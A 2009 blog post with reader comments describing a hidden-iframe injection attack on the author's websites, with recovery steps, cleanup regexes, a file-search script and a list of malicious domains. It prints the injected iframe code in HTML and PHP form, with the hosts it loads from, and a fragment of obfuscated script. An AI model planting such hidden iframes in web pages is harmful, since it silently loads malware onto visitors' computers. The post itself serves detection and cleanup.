[Updated on October 27, 2009 with new a version of the script]
It is a shame that after all those posts about security, some of my websites were under attack today.
Shoban and Anand emailed me about this today morning (Thanks guys) and I tried to understand what was going on. To my utter disbelief more than 10 websites hosted in the same server were affected by the attack.
All the index.* files in the server were infected with a piece of code that loaded a hidden iframe in the page.
To the html pages the following piece of code was added:
<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
To php pages it added:
echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
Asha took the effort and cleaned most of the infected files. We are monitoring the status now.
How did the worm inject the hidden iframes to my files?
There are two ways through which the worm is believed to infect your files:
1) Server is compromised
This is the most common way. Some o the websites residing in the same web server as your website may be compromised (o it may be some vulnerabilities in your web application itself) that caused the web server to be compromised. Once the server is compromised, the worm will spread to all the websites in the server.
2) Client side FTP
The worm resides in some/any of the client side PCs you use for accessing the ftp/control panel accounts of your hosting server.
When you type in the username and password for the ftp/control panel account, the worm silently reads the credentials, accesses your ftp account and infects the files in the server. It adds the above mentioned code to all index.* files.
How can I recover from a hidden iframe injection attack?
Here are a few tips that might help you:
- The first thing to do to prevent these kinds of attacks is to change your ftp, control panel and database passwords as soon as possible.
- Notify your web host about the attack and advice them to take measures against a possible server wide attack.
- Change the file permissions in your server to the maximum secure mode.
- Download all your files from the server and check for infections. Clean the infected files.
- Using a good antivirus software, scan and clean every PC you use for logging into your hosting server.
- Never use public computers to access your server.
How do I clean infected files?
Use these regular expressions to search for all pages containig the malicious code and replace it with space:
<iframe src=\”http://[^"]*” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>
echo \”<iframe src=\\\”http://[^"]*\” width=1 height=1 style=\\\”visibility:hidden;position:absolute\\\”></iframe>\”;
You may have to write a script to automate this for all the files in the server.
I have cooked up a php script that can help you find out the infected files. Download the file from here, save it as clean.php (it is currently clean.php.txt) and upload it to the root folder of your website.
You may want to change some hardcoded values inside the file.
Then visit the url:
http://www.yourdomain.com/clean.php?c=iframe
The parameter c specifies the text to search for inside the file. The results will be something like:
It will search all the files in your website and if any of the files contains the given string, it will print the filename along with the number of occurrences of the string. In the above screenshot, you can see that one file is infected.
Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So as of now you will have to clean the files manually.
Faiz has written an advanced ASP.Net script for finding the infected files, and it can be found here.
Will my search engine rankings be affected by this attack?
Try to be fast with these steps because if a visitor see the message “This site may harm your computer” pop up when (s)he try to access your website/blog, (s)he may not return again. Remember that if the security of your website is compromised, it can affect the search engine rankings of the website. Besides, it may pave way for more sophisticated attacks.
Google will mark your site in it’s search results with a warning: “This site may harm your computer”.
Use the following link to see what google thinks about your website (give the url of your site instead of shopfloorbd.co.uk):
http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk
As mentioned above, you must remove the malware from your local machine using some antivirus software. AVG sees it as “Trojan Horse Downloader” and NOD32 sees it as “JS/Kryptik.B trojan”.
Note that when visiting an infected site, some antivirus softwares prompt you that “Trojan Horse Downloader”, an exe-file is trying to get loaded. Once the exe infects your machine, it will infect your server too.
Here are some more code samples caught from the wild:
<iframe src=”http://hostverify.net/?click=2730375″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
<iframe src=”http://hosttracker.net/?click=32431937″ width=1 height=1 style=”visibility:hidden;position:absolute”>
There are obfuscated versions of the attack code too:
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){… etc.
Here is a list of some other websites that host malicious content:
gumblar.cn
martuz.cn
beladen.net
38zu.cn
googleanalytlcs.net
lousecn.cn
fqwerz.cn
d99q.cn
orgsite.info
94.247.2.0
94.247.2.195
http://mmsreader.com
http://google-ana1yticz.com
http://my2.mobilesect.info
http://thedeadpit.com
http://internetcountercheck.com
http://165.194.30.123
http://ruoo.info
gogo2me.net/
http://live-counter.net
http://klinoneshoes.info
protection-livescan.com/
http://webexperience13.com
http://q5x.ru
http://q5x.rugumblar.cnmartuz.cnbeladen.net38zu.cngoogleanalytlcs.netlousecn.cnfqwerz.cnd99q.cnorgsite.info94.247.2.094.247.2.195http://mmsreader.comhttp://google-ana1yticz.comhttp://my2.mobilesect.infohttp://thedeadpit.comhttp://internetcountercheck.comhttp://165.194.30.123http://ruoo.infogogo2me.net/http://live-counter.nethttp://klinoneshoes.infoprotection-livescan.com/http://webexperience13.comhttp://q5x.ru
If you find these urls in any code in your website, that is a sure shot sign that you are infected.
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ [...]
Hi
I see code injections with encrypted javascript like following.
“document.write(unescape(“%3c%69%66%72%61%6d%65%20%73%72%6
Clean up any such code which is not inserted by you in your site code. Use some decryption sites or application to see actual link.
I want to really thank you for your post here about the issue. It completely took down our site just days before a very important VC meeting. Without the excellent writeup you posted about this issue we wold have been sunk. Your writing ws clear, the problem was well described and your clean.php file worked great. Kudos!!!!!
Wow cool man .
Thanks that my server admin does a great job . So my site is not effected .
Hi,
very helpful article. Add to the malicious site list this: http://asfirey.net/?click=FA62A
yes big kudos, how frustrating
as if there isnt already enought to do rather than spend days fighting this thing
had nearly 100 sitea affected
will check the clean script out and the other one and post back here hjow it goes
[...] and others providing blogging solutions, in all evenhandedness I’m extending this gesture; kindly [Click to view] the blog. I can be reached if not well [...]
really a usefull info that u were given in this article
thak you very much…
but im in doubt
im using adsense will your script that u have cooked
[ clean.php.txt ] will affect my earnings through adsense
plzzzz mail to me
plzzzzz i want reply…..
[...] i started searching on the net and found some interesting information on the blog of Niyaz PK. I followed his intructions step by step and hopefully everything is back to normal now. I have [...]
website saya beberapa waktu ini terkena juga trojan ini. saya check di google safe browsing ternyata jaringan dimana hosting saya terletak memang telah diinfeksi. saya sudah lapor ke penyedia hosting. mungkin terpaksanya saya memakai reguler expression yang di ajarkan disini demi keamanan
terima kasih informasinya
We had to battle an inframe attack a few months ago and it is right that this is not a server issue. THe first time it happened we turned the site off to the public and cleaned all of the infected pages uploaded and we were good for about 8 hours then it happened again. SO this time we ran avast which had already been running on the computers since new and it found nothing so again we reuploaded all of the cleaned files and bam again it shows up. Now we were getting pissed so on advice from another developer we tried malewarebytes and there they were multiple malware found on the computer. SO we used malewarebytes to deal with what it found and we went out and got Norton for all computers that access our ftp servers and have not had a problem since. We also did change the passwords for the site each time we were attacked. So in summary do not be cheap with anti virus software it cost us hours and hours of time and a couple of of site down time that could have been prevented by just having adequate ant ivrus in the first place.
We also found maleware using malewarebytes which may have been how some of our client websites had been compromised through FTP access leaving us with a trail of iframe infected index files.
We have since blocked all FTP access and setup the plesk firewal to only allow safe IP addresse’s that wehave gathered from the know clients that use the FTP.
Two day now and we have had no trouble.
What a nuisance.
Thanks for the informative post, and thanks those who commented with more info.
I’m running on a major US web host, and just suffered this very issue.
I’m in the process of documenting new FTP usage policies for accessing production hosting servers. Are there any other precautions that should be taken, besides those here?
Dear Sir,
I read over you’re blog and thank you i found alot of issues from this hidden iframe it just started to attack both my music sites and server recently and well i am having hell trying to remove everything since the sites are so big can you contact me personally and possibly i can pay you to secure my system?
Matthew Nalett
admin@newmusicpromote.com
PS : Only the admin of this blog who posted this tutorial please email me thank you.
I have tried to run the script in the root directory but avast tells me to abort the connection.
Should I ignore avast and let the page load?
[...] of the attack. You should also change your password for your site immediately. There are various sites on how to recover files and clean up your [...]
I know how find & clean your infected files on your site.
If you interested – icq 274314 one one 8
Is there a way by which i can search all the files??????????
not only the specified files with the given file name but all the files!!
can u??? plsssssssss
Dheeraj,
I have modified the script. It now does search in all the files. Beware that it will search in all file including css, js, images, etc. and so if you have very large files, the search will be slow.
thanks a lot!!!! ur script has saved me!! thnq!